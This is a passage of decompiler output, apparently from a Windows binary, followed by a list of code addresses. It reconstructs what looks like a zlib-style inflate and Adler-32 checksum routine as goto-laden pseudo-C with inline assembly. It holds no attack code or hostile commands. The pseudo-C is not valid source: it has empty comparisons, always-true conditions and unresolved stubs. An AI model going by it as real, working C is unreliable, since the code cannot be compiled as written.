				if (_t922 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1259 + 0xf4)) != 0) goto 0xf305f43b;
				_t1217 = _t1269 + 0xf311ef08;
				_t1160 =  *((intOrPtr*)(_t1259 + 0x1a8));
				_t924 = _t1217 - _t1160;
				if (_t924 > 0) goto 0xf30603b1;
				_t1025 = (_t1269 - _t1287 &  *(_t1259 + 0xb8)) - _t1269;
				if (_t924 < 0) goto 0xf3060a9a;
				if (_t1025 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t504 =  *(_t1259 + 0x40);
				_t775 =  *(_t1259 + 0x50);
				if (_t504 - 3 > 0) goto 0xf3060605;
				_t674 =  *(_t1259 + 0x38);
				if (_t674 == 0) goto 0xf3060421;
				_t1246 = _t1333;
				if (_t674 - 8 >= 0) goto 0xf3060436;
				if (_t1246 == __r15) goto 0xf3060413;
				_t1094 =  *(_t1259 + 0x30) | _t1160 << _t674;
				 *(_t1259 + 0x30) = _t1094;
				 *(_t1259 + 0x38) = _t674 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t775;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1246 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1163 = _t1094 >> 8;
				 *(_t1259 + 0x30) = _t1163;
				 *(_t1259 + 0x38) = ( *(_t1294 + 0x14) << 8) + 0xfffffff8;
				_t738 =  *(_t1294 + 0x14) << 8;
				_t680 = _t604 & 0x000000ff | _t738;
				 *(_t1294 + 0x14) = _t680;
				 *(_t1259 + 0x40) = _t504 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t775;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t507 = _t680 & 0x000000ff;
				if (_t507 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t831 =  !_t829 & _t738;
				_t1164 = _t1163 >> _t507;
				 *(_t1259 + 0x30) = _t1164;
				 *(_t1259 + 0x38) = _t604;
				 *(_t1259 + 0x40) =  *(_t1259 + 0x40) + _t831;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1259 + 0x30) = _t1164 >> _t507;
				 *(_t1259 + 0x38) = _t604;
				 *(_t1259 + 0x3c) =  *(_t1259 + 0x3c) + ( !_t831 & _t738);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1259 + 0x30) = _t1094 >> _t507;
				 *(_t1259 + 0x38) = _t775;
				 *(_t1259 + 0x80) = _t1025;
				 *(_t1259 + 0x88) = _t1025;
				 *((long long*)(_t1259 + 0x90)) = 0xb;
				_t684 =  *(_t1259 + 0x3c);
				_t1026 = _t1025 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t684 != 0x10) goto 0xf30606d9;
				if (_t1217 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1259 + 0x30) = _t1026 >> 8;
				 *(_t1259 + 0x38) = _t684 + 0xfffffff8;
				 *(_t1259 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t510 =  *(_t1294 + 0x291d) & 0x0000ffff;
				 *(_t1259 + 0x40) = _t510;
				r12b = 0x1e;
				if (_t510 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t510 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1122 =  *((intOrPtr*)(_t1259 + 0x128));
				E000007FE7FEF30F24C0();
				_t1295 =  *((intOrPtr*)(_t1259 + 0x58));
				 *(_t1259 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t1026 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1259 + 0x6c);
				if (_t1122 - 1 > 0) goto 0xf3060acc;
				_t688 =  *(_t1259 + 0x38);
				_t515 =  *((short*)(_t1295 + 0x3c + _t1026 * 2));
				if (_t515 < 0) goto 0xf3060659;
				if ((_t515 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t516 = _t515 >> 9;
				if (_t688 - _t516 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t688 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t516 - 0x23f > 0) goto 0xf3061218;
				_t518 =  *((short*)(_t1295 + 0x83c + _t1026 * 2));
				if (_t518 >= 0) goto 0xf3060690;
				if (_t688 - 0xc >= 0) goto 0xf3060663;
				if (_t518 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1337 = __r15 + 1;
				 *(_t1259 + 0x30) =  *(_t1259 + 0x30) | _t1026 << _t688;
				 *(_t1259 + 0x38) = _t1122 + 8;
				_t953 = _t688 - 6;
				if (_t953 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1200 =  *((intOrPtr*)(_t1259 + 0x80 + _t1026 * 8)) + (_t1094 & 0xffffffff);
				if (_t953 < 0) goto 0xf30613e0;
				if (_t1200 + _t1217 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1200 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1259 + 0x40) =  *(_t1259 + 0x40) + _t775;
				r12b = 0xa;
				_t1296 =  *((intOrPtr*)(_t1259 + 0x58));
				_t1304 =  *((intOrPtr*)(_t1259 + 0x1a0));
				_t1272 =  *((intOrPtr*)(_t1259 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t799 =  *(_t1259 + 0x38);
				 *(_t1259 + 0x68) =  *(_t1259 + 0x3c);
				r9d =  *(_t1259 + 0x44);
				_t1032 = __r15 - _t1337;
				r12b = 0xc;
				if (_t1032 - 0xe < 0) goto 0xf3060b66;
				if (_t799 - 0x1d > 0) goto 0xf3060794;
				_t1033 = _t1032 << _t799;
				_t1338 = _t1337 + 4;
				_t691 =  *((short*)(_t1296 + 0x3c + _t1033 * 2));
				if (_t691 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t691 - 0x23f > 0) goto 0xf306126f;
				_t961 =  *((short*)(_t1296 + 0x83c +  &(( *(_t1259 + 0xe8))[_t1217]) * 2));
				if (_t961 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t961 < 0) goto 0xf30608a8;
				_t532 =  *((short*)(_t1296 + 0x3c + _t1033 * 2));
				if (_t532 < 0) goto 0xf3060820;
				if ((_t532 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t532 - 0x23f > 0) goto 0xf306127b;
				_t534 =  *((short*)(_t1296 + 0x83c + _t1033 * 2));
				if (_t534 < 0) goto 0xf3060825;
				_t535 = _t534 & 0x0000ffff;
				_t966 = _t1272 -  *((intOrPtr*)(_t1259 + 0x1a8));
				if (_t966 >= 0) goto 0xf3061284;
				_t802 = _t799 + 0x20;
				 *(_t1304 + _t1272) = bpl;
				_t1124 = _t1272 + 1;
				asm("bt eax, 0x8");
				if (_t966 < 0) goto 0xf30608a3;
				_t1173 =  *((intOrPtr*)(_t1259 + 0x1a8));
				if (_t1124 - _t1173 >= 0) goto 0xf30612a2;
				 *(_t1304 + _t1272 + 1) = _t535;
				if (_t1173 - _t1272 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1274 = _t1124;
				_t537 = _t535 & 0x000001ff;
				if (_t537 == 0x100) goto 0xf3060b5e;
				if (_t537 - 0x11d > 0) goto 0xf3061298;
				if (_t802 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1338 - 3 <= 0) goto 0xf306140a;
				_t1339 = _t1338 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t545 =  *((short*)(_t1296 + 0xdda));
				if (_t545 < 0) goto 0xf3060955;
				if ((_t545 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t545 - 0x23f > 0) goto 0xf306127b;
				_t547 =  *((short*)(_t1296 + 0x15da));
				if (_t547 < 0) goto 0xf306095a;
				_t805 = _t802 + 0x20 - r9d - 0xb;
				if ((_t547 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1259 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1259 + 0x118)) = _t1287;
				if (r9d == 0) goto 0xf3060a01;
				if (_t805 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1339 - 3 <= 0) goto 0xf306140a;
				_t1209 = ((( *(_t1259 + 0x30) | _t1033) >> 0x0000000a >> 0xb | __r15 - _t1338 << _t802) >> r9d >> 0xb | 0xffffffff << r9d << _t805) >> r9d;
				_t807 = _t805 + 0x20 - r9d;
				 *(_t1259 + 0x68) = ( !( *_t1339) & _t775) +  *(_t1259 + 0x68);
				r9d =  *(_t1259 + 0x68);
				if (_t1274 - _t1287 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1259 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1259 + 0x70)) = _t1315;
				 *((long long*)(_t1259 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1259 + 0x28)) =  *(_t1259 + 0xb8);
				 *((long long*)(_t1259 + 0x20)) = 0xf311ef68;
				_t1127 = _t1304;
				_t1178 =  *((intOrPtr*)(_t1259 + 0x1a8));
				E000007FE7FEF306148C(_t1127, _t1178, _t1274, _t1287);
				if ( *((intOrPtr*)(_t1259 + 0x1a8)) - _t1274 +  *((intOrPtr*)(_t1259 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1259 + 0x40) = _t807;
				goto 0xf305f43b;
				_t1049 =  *(_t1259 + 0xb8);
				 *((long long*)(_t1259 + 0x28)) = _t1049;
				 *((long long*)(_t1259 + 0x20)) = _t1127;
				_t1128 =  *((intOrPtr*)(_t1259 + 0x1a0));
				_t556 = E000007FE7FEF306148C(_t1128, _t1178, _t1127,  *((intOrPtr*)(_t1259 + 0x118)));
				_t1298 =  *((intOrPtr*)(_t1259 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t710 = _t556;
				_t1180 = _t1178 << _t710 |  *(_t1259 + 0x30);
				 *(_t1259 + 0x30) = _t1180;
				 *(_t1259 + 0x38) = _t556 + 0x10;
				goto 0xf3060aee;
				_t776 =  *((short*)(_t1298 + 0x3c + _t1128 * 2));
				if (_t776 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t776 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t779 =  *((short*)(_t1298 + 0x83c + _t1209 * 2));
				if (_t779 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1259 + 0x30) = _t1180 >> 0xb;
				 *(_t1259 + 0x38) = _t710 - 0xb;
				 *(_t1259 + 0x40) = _t779 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1259 + 0x30) = _t1209;
				 *(_t1259 + 0x38) = _t807;
				 *(_t1259 + 0x3c) =  *(_t1259 + 0x68);
				 *(_t1259 + 0x40) = 0x100;
				 *(_t1259 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1128 + 8)) = 0xfd;
				 *_t1128 = _t1049;
				 *((long long*)(_t1128 + 0x10)) = _t1049;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1299 =  *((intOrPtr*)(_t1259 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t562 = r9b & 0xffffffff;
				if (_t562 == 0xfc) goto 0xf3060cbe;
				_t717 =  *(_t1259 + 0x38);
				_t783 =  >=  ? _t562 - r15d + r14d : _t717 >> 3;
				_t565 = _t1209 * 8;
				 *(_t1259 + 0x38) = _t717 - _t565;
				_t1220 =  &(_t1339[1]);
				_t1257 =  *((intOrPtr*)(_t1259 + 0x1b0));
				goto 0xf3060cc0;
				_t1129 =  *((intOrPtr*)(_t1259 + 0x1a8));
				if ( *((intOrPtr*)(_t1259 + 0x70)) != _t1129) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t565 & 0xffffff00 | r12b == 0x00000017);
				_t1281 = _t1129;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1299 + 0x291c) = r12b;
				_t719 =  *(_t1259 + 0x38);
				 *(_t1299 + 8) = _t719;
				 *(_t1299 + 0x24) =  *(_t1259 + 0x3c);
				 *(_t1299 + 0x28) =  *(_t1259 + 0x40);
				 *(_t1299 + 0x2c) =  *(_t1259 + 0x44);
				 *_t1299 =  !(0xffffffff << _t719) &  *(_t1259 + 0x30);
				_t994 =  *(_t1259 + 0x1b8) & 0x00000040;
				if (_t994 != 0) goto 0xf3061169;
				if (_t994 == 0) goto 0xf3061169;
				_t995 = r9b;
				if (_t995 < 0) goto 0xf3061169;
				_t1098 = _t1281 - _t1257;
				if (_t995 < 0) goto 0xf306137a;
				 *(_t1259 + 0xb8) = _t1209;
				 *(_t1259 + 0x6c) = r9d;
				if (_t1281 -  *((intOrPtr*)(_t1259 + 0x1a8)) > 0) goto 0xf3061389;
				_t569 =  *(_t1299 + 0x20);
				_t1307 =  *((intOrPtr*)(_t1259 + 0x1a0)) + _t1257;
				_t786 = _t569 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1131 = _t1098 & 0xfffffffc;
				 *(_t1259 + 0xf8) = _t1098;
				 *(_t1259 + 0x108) = _t1098;
				_t1058 = _t1131 - 0x3f51f0dfc0;
				 *(_t1259 + 0x50) = _t1058;
				r12d = 0x56c0;
				 *(_t1259 + 0xe8) = _t1307;
				 *(_t1259 + 0xd8) = _t1220;
				 *(_t1259 + 0x7c) = _t786;
				 *(_t1259 + 0x100) = _t1131;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t786 * 0x56c0;
				_t1318 = _t1307;
				 *(_t1259 + 0x80) =  *_t1318 & 0x000000ff;
				 *(_t1259 + 0x84) = _t1318[1] & 0x000000ff;
				 *(_t1259 + 0x88) = _t1318[2] & 0x000000ff;
				 *(_t1259 + 0x8c) = _t1318[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1259 + 0xc0 + _t1299 * 4)) =  *((intOrPtr*)(_t1259 + 0xc0 + _t1299 * 4)) +  *((intOrPtr*)(_t1259 + 0x80 + _t1299 * 4));
				_t363 = _t1299 + 1; // 0x1
				if (_t363 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1259 + 0xa0 + _t1220 * 4)) =  *((intOrPtr*)(_t1259 + 0xa0 + _t1220 * 4)) +  *((intOrPtr*)(_t1259 + 0x80 + _t1220 * 4));
				_t373 = _t1220 + 1; // 0x1
				_t999 = _t373 - 4;
				if (_t999 != 0) goto 0xf3060e4c;
				_t1059 = _t1058 + 0xfffffffc;
				if (_t999 != 0) goto 0xf3060dea;
				_t613 =  *(_t1259 + 0xc0 + _t1059 * 4);
				 *(_t1259 + 0xc0 + _t1059 * 4) = _t613;
				_t380 = _t1059 + 1; // 0x1
				_t1099 = _t380;
				_t1060 = _t1099;
				if (_t1099 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1259 + 0xa0 + _t1060 * 4)) =  *((intOrPtr*)(_t1259 + 0xa0 + _t1060 * 4)) - _t613 * 0xfff1;
				_t387 = _t1060 + 1; // 0x1
				if (_t387 != 4) goto 0xf3060ea7;
				_t1064 = _t1257 * _t1131 >> 0x2f;
				_t1002 = 0x3f51f08900 - __r12;
				if (_t1002 >= 0) goto 0xf3060de2;
				_t1345 =  *(_t1259 + 0x108);
				r14d = r14d & 0x00000003;
				_t1284 =  *((intOrPtr*)(_t1259 + 0x58));
				r10d =  *(_t1259 + 0x1b8);
				_t1225 =  *(_t1259 + 0xe8);
				r12d =  *(_t1259 + 0x7c);
				if (_t1002 == 0) goto 0xf3060fc8;
				_t1290 = 0x3f51f0dfc0 + _t1225;
				 *(_t1259 + 0x80) =  *_t1290 & 0x000000ff;
				 *(_t1259 + 0x84) = _t1290[1] & 0x000000ff;
				 *(_t1259 + 0x88) = _t1290[2] & 0x000000ff;
				 *(_t1259 + 0x8c) = _t1290[3] & 0x000000ff;
				 *((intOrPtr*)(_t1259 + 0xc0 + _t1064 * 4)) =  *((intOrPtr*)(_t1259 + 0xc0 + _t1064 * 4)) +  *((intOrPtr*)(_t1259 + 0x80 + _t1064 * 4));
				_t411 = _t1064 + 1; // 0x1
				_t1187 = _t411;
				_t1065 = _t1187;
				if (_t1187 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t751 =  *(_t1259 + 0x80 + _t1065 * 4);
				 *((intOrPtr*)(_t1259 + 0xa0 + _t1065 * 4)) =  *((intOrPtr*)(_t1259 + 0xa0 + _t1065 * 4)) + _t751;
				_t421 = _t1065 + 1; // 0x1
				_t1188 = _t421;
				_t1066 = _t1188;
				_t1004 = _t1188 - 4;
				if (_t1004 != 0) goto 0xf3060f9f;
				if (_t1004 != 0) goto 0xf3060f41;
				_t752 = _t751 * 0xfff1;
				 *((intOrPtr*)(_t1259 + 0xc0 + _t1066 * 4)) =  *((intOrPtr*)(_t1259 + 0xc0 + _t1066 * 4)) - _t752;
				_t429 = _t1066 + 1; // 0x1
				_t1192 = _t429;
				_t1067 = _t1192;
				if (_t1192 != 4) goto 0xf3060fd7;
				r9d =  *(_t1259 + 0x6c);
				 *((intOrPtr*)(_t1259 + 0xa0 + _t1067 * 4)) =  *((intOrPtr*)(_t1259 + 0xa0 + _t1067 * 4)) - _t752 * 0xfff1;
				_t438 = _t1067 + 1; // 0x1
				_t1196 = _t438;
				_t1068 = _t1196;
				if (_t1196 != 4) goto 0xf3061019;
				 *(_t1259 + 0xa0 + _t1068 * 4) =  *(_t1259 + 0xa0 + _t1068 * 4) << 2;
				_t1069 = _t1068 + 1;
				if (_t1069 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1259 + 0xa4)) =  *((intOrPtr*)(_t1259 + 0xa4)) -  *((intOrPtr*)(_t1259 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1259 + 0xa8)) =  ~( *((intOrPtr*)(_t1259 + 0xc8)) +  *((intOrPtr*)(_t1259 + 0xc8))) +  *((intOrPtr*)(_t1259 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1259 + 0xac)) =  *((intOrPtr*)(_t1259 + 0xac)) + _t1196 + _t1196 * 2;
				_t1070 = _t1069 + 1;
				if (_t1070 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1259 + 0x50);
				_t1072 = _t1070 * _t1257 >> 0x2f;
				_t1073 = _t1072 + 1;
				if (_t1073 != 4) goto 0xf30610e4;
				if (_t1345 == 0) goto 0xf306110b;
				_t729 = r12d +  *((intOrPtr*)(_t1259 + 0xc0 + _t1069 * 4)) + ( *(_t1225 +  *(_t1259 + 0x100) + _t1073) & 0x000000ff);
				_t855 = (_t569 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1259 + 0xa0 + _t1072 * 4)) + _t729;
				if (_t1345 != _t1073 + 1) goto 0xf30610fb;
				_t598 = _t855 * 0xfff1;
				_t858 = _t855 - _t598 << 0x00000010 | _t729 - _t729 * 0x0000fff1;
				 *(_t1284 + 0x20) = _t858;
				_t1012 = r9b;
				if (_t1012 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t1012 == 0) goto 0xf306117f;
				r9b = _t858 ==  *((intOrPtr*)(_t1284 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t1080 =  *((intOrPtr*)(_t1259 + 0x110));
				 *(_t1080 + 8) = r9b;
				 *_t1080 =  *((intOrPtr*)(_t1259 + 0xe0)) -  *(_t1259 + 0xb8) + __r15 +  *(_t1259 + 0xd8);
				 *((long long*)(_t1080 + 0x10)) = _t1284 - _t1257;
				return _t598;
			}

0x7fef305fbfd
0x7fef305fc02
0x7fef305fc0b
0x7fef305fc10
0x7fef305fc14
0x7fef305fc24
0x7fef305fc2c
0x7fef305fc37
0x7fef305fc3a
0x7fef305fc50
0x7fef305fc55
0x7fef305fc57
0x7fef305fc61
0x7fef305fc64
0x7fef305fc6c
0x7fef305fc70
0x7fef305fc73
0x7fef305fc79
0x7fef305fc7e
0x7fef305fc85
0x7fef305fc87
0x7fef305fc9b
0x7fef305fca0
0x7fef305fcb6
0x7fef305fcbb
0x7fef305fcbe
0x7fef305fcc3
0x7fef305fccb
0x7fef305fcd5
0x7fef305fcdc
0x7fef305fcf3
0x7fef305fcf5
0x7fef305fcfe
0x7fef305fd04
0x7fef305fd09
0x7fef305fd15
0x7fef305fd18
0x7fef305fd1d
0x7fef305fd20
0x7fef305fd24
0x7fef305fd27
0x7fef305fd2a
0x7fef305fd2f
0x7fef305fd36
0x7fef305fd38
0x7fef305fd3a
0x7fef305fd4a
0x7fef305fd4d
0x7fef305fd56
0x7fef305fd59
0x7fef305fd61
0x7fef305fd66
0x7fef305fd69
0x7fef305fd72
0x7fef305fd7a
0x7fef305fd81
0x7fef305fd95
0x7fef305fd9f
0x7fef305fda3
0x7fef305fda9
0x7fef305fdb3
0x7fef305fdb6
0x7fef305fdca
0x7fef305fdce
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
